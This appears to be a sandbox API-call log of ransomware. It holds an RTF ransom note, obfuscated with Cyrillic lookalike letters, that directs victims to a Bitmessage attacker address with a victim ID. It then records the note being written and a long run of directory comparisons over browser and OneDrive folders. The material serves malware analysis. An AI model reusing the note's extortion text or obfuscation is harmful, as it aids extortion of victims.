s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n data-li\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0300.445] WriteFile (in: hFile=0x2d4, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.445] CloseHandle (hObject=0x2d4) returned 1 [0300.445] Sleep (dwMilliseconds=0x3e8) [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount2=65) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount2=139) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount2=174) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount2=174) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount2=84) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount2=84) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount2=84) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount2=79) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount2=79) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount2=79) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount1=79, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0301.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount2=73) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount1=79, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount2=73) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount2=73) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount2=78) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount2=78) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount2=78) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount1=79, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount2=78) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\", cchCount2=139) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service 